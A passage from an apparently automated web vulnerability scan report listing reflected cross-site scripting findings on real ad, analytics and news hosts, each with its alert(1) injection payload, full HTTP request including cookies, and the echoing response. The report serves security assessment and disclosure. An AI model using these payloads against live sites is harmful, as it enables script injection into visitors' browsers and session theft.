The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 43a79<script>alert(1)</script>dd3f69c507c was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=613540443a79<script>alert(1)</script>dd3f69c507c&c3=15&c4=13236&c5=&c6=&c10=3203787&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Feb 2011 01:40:59 GMT
Date: Sun, 30 Jan 2011 01:40:59 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"613540443a79<script>alert(1)</script>dd3f69c507c", c3:"15", c4:"13236", c5:"", c6:"", c10:"3203787", c15:"", c16:"", r:""});

5.166. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 5141c<script>alert(1)</script>2e5b41528d3 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=155141c<script>alert(1)</script>2e5b41528d3&c4=13236&c5=&c6=&c10=3203787&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Feb 2011 01:41:00 GMT
Date: Sun, 30 Jan 2011 01:41:00 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"155141c<script>alert(1)</script>2e5b41528d3", c4:"13236", c5:"", c6:"", c10:"3203787", c15:"", c16:"", r:""});

5.167. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 9293a<script>alert(1)</script>f40783d132b was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=132369293a<script>alert(1)</script>f40783d132b&c5=&c6=&c10=3203787&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Feb 2011 01:41:00 GMT
Date: Sun, 30 Jan 2011 01:41:00 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"132369293a<script>alert(1)</script>f40783d132b", c5:"", c6:"", c10:"3203787", c15:"", c16:"", r:""});

5.168. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload c4a9f<script>alert(1)</script>8ebac23ddb was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=13236&c5=c4a9f<script>alert(1)</script>8ebac23ddb&c6=&c10=3203787&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Feb 2011 01:41:00 GMT
Date: Sun, 30 Jan 2011 01:41:00 GMT
Connection: close
Content-Length: 3593

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"13236", c5:"c4a9f<script>alert(1)</script>8ebac23ddb", c6:"", c10:"3203787", c15:"", c16:"", r:""});

5.169. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload b3111<script>alert(1)</script>7cb1ccd4cdb was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=13236&c5=&c6=b3111<script>alert(1)</script>7cb1ccd4cdb&c10=3203787&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Feb 2011 01:41:01 GMT
Date: Sun, 30 Jan 2011 01:41:01 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
omscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"13236", c5:"", c6:"b3111<script>alert(1)</script>7cb1ccd4cdb", c10:"3203787", c15:"", c16:"", r:""});

5.170. http://bodyodd.msnbc.redacted/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bodyodd.msnbc.msn.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a15c"><script>alert(1)</script>f4addc07d04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?1a15c"><script>alert(1)</script>f4addc07d04=1 HTTP/1.1
Host: bodyodd.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:06:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109695

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>The Body Odd</title>
<met
...[SNIP]...
<a class="vine-customContent-moreLink" href="/?1a15c"><script>alert(1)</script>f4addc07d04=1&nvo=0&16697492|a|nu|30|1|t|a|0=12">
...[SNIP]...

5.171. http://boyle.newsvine.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://boyle.newsvine.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab874"-alert(1)-"1395f8ac659 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?ab874"-alert(1)-"1395f8ac659=1 HTTP/1.1
Host: boyle.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:51:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=8d410fec781195f3ae452149bdba91fe; expires=Sat, 25-Jan-2031 17:51:54 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 88082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
ML = "";currentCommentBox = commentId;var renderedCommentBox = renderCommentBox ("http://www.newsvine.com/_action","http://www.polls.newsvine.com/_vine/images/_/","1357996","http://boyle.newsvine.com/?ab874"-alert(1)-"1395f8ac659=1", 0,commentId, "", "", groupId, friendListId, threadId, privateLabel, "01", -1);getElement("dynamicCommentBox_"+commentId).innerHTML = renderedCommentBox;placeSpellChecker ("commentsTextDiv_"+commen
...[SNIP]...

5.172. http://cartoonblog.msnbc.redacted/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cartoonblog.msnbc.redacted
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bcba"><script>alert(1)</script>a8948eec705 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9bcba"><script>alert(1)</script>a8948eec705=1 HTTP/1.1
Host: cartoonblog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:06:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 96204

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Cartoon Blog</title>
<met
...[SNIP]...
<a class="vine-customContent-moreLink" href="/?9bcba"><script>alert(1)</script>a8948eec705=1&nvo=0&26463067|a|nu|30|1|t|a|0=12">
...[SNIP]...

5.173. http://cdn-cms.scout.com/feeds/analyticsfeed.ashx [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn-cms.scout.com
Path:   /feeds/analyticsfeed.ashx

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 9abcf<script>alert(1)</script>b5f8440495c was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/analyticsfeed.ashx?page=http%3A//recruiting.scout.com/a.z%3Fs%3D73%26p%3D9%26c%3D4%27%26pid%3D88%26yr%3D2011&format=json&callback=$.analytics.report9abcf<script>alert(1)</script>b5f8440495c HTTP/1.1
Host: cdn-cms.scout.com
Proxy-Connection: keep-alive
Referer: http://recruiting.scout.com/a.z?s=73&p=9&c=4'&pid=88&yr=2011
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmz=202704078.1295040115.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/18; __utma=202704078.801620371.1294455998.1294851033.1295040115.3; RefId=0; BrandId=0; SessionBrandId=0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 01:42:04 GMT
Connection: close
Akamai: True
Content-Length: 360

$.analytics.report9abcf<script>alert(1)</script>b5f8440495c({"network":"Scout","site":"recruiting","sports":[],"categories":[],"pagetype":"Recruiting","pagesubtype":"","author":"","dateoverride":{"rfc822":"","year":"","month":"","day":"","hour":"","minute":"",
...[SNIP]...

5.174. http://cdn-forums.scout.com/adfeed.ashx [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn-forums.scout.com
Path:   /adfeed.ashx

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload dae03<script>alert(1)</script>e852a0a6e49 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adfeed.ashx?s=73&format=json&callback=$.showAd.cacheAdCodesdae03<script>alert(1)</script>e852a0a6e49 HTTP/1.1
Host: cdn-forums.scout.com
Proxy-Connection: keep-alive
Referer: http://recruiting.scout.com/a.z?s=73&p=9&c=4'&pid=88&yr=2011
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmz=202704078.1295040115.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/18; __utma=202704078.801620371.1294455998.1294851033.1295040115.3; RefId=0; BrandId=0; SessionBrandId=0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Server: Mbrd8
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Website-Assembly-Version: 2.21.0.0
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 01:42:14 GMT
Connection: close
Akamai: True
Content-Length: 334

$.showAd.cacheAdCodesdae03<script>alert(1)</script>e852a0a6e49({"ads":[{"code":"SPTSN1","height":90,"type":"DISPLAY","width":728},{"code":"SPTSN3","height":600,"type":"DISPLAY","width":160},{"code":"SPTSN4","height":250,"type":"DISPLAY","width":300},{"code":"SPTS
...[SNIP]...

5.175. http://cosmiclog.msnbc.redacted/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cosmiclog.msnbc.redacted
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c4ad"><script>alert(1)</script>299dbf28056 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?5c4ad"><script>alert(1)</script>299dbf28056=1 HTTP/1.1
Host: cosmiclog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:08:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 145326

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Cosmic Log</title>
<meta
...[SNIP]...
<a class="vine-customContent-moreLink" href="/?5c4ad"><script>alert(1)</script>299dbf28056=1&nvo=0&16233818|a|nu|30|1|t|a|0=12">
...[SNIP]...

5.176. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d2/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 252d4'%3balert(1)//21a050c29ea was submitted in the $ parameter. This input was echoed as 252d4';alert(1)//21a050c29ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d2/jsc/fm.js?c=286&a=0&f=&n=929&r=13&d=14&q=&$=252d4'%3balert(1)//21a050c29ea&s=123&z=0.2442760558333248 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; FFcat=826,187,14:951,11,14:826,187,7:951,7,7:951,2,7; FFad=0:0:1:0:0; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=929:252d4';alert(1)//21a050c29ea;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "81ee0c62-82a5-4989a5416ab80"
Vary: Accept-Encoding
X-Varnish: 2233582304 2233582012
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=254
Expires: Sat, 29 Jan 2011 23:22:44 GMT
Date: Sat, 29 Jan 2011 23:18:30 GMT
Connection: close
Content-Length: 2378

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat=',252d4';alert(1)//21a050c29ea';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,252d4';alert(1)//21a050c29ea;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

5.177. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d2/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5a47"%3balert(1)//a05e4eb410d was submitted in the $ parameter. This input was echoed as a5a47";alert(1)//a05e4eb410d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d2/jsc/fm.js?c=286&a=0&f=&n=929&r=13&d=14&q=&$=a5a47"%3balert(1)//a05e4eb410d&s=123&z=0.2442760558333248 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; FFcat=826,187,14:951,11,14:826,187,7:951,7,7:951,2,7; FFad=0:0:1:0:0; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=929:a5a47";alert(1)//a05e4eb410d;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "81ee0c62-82a5-4989a5416ab80"
Vary: Accept-Encoding
X-Varnish: 2233582304 2233582012
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=255
Expires: Sat, 29 Jan 2011 23:22:44 GMT
Date: Sat, 29 Jan 2011 23:18:29 GMT
Connection: close
Content-Length: 2392

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat=',a5a47";alert(1)//a05e4eb410d';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,a5a47";alert(1)//a05e4eb410d;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                   var zzStr = "s=123;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + M
...[SNIP]...

5.178. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d2/jsc/fm.js

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e50f4'-alert(1)-'430b04548c0 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

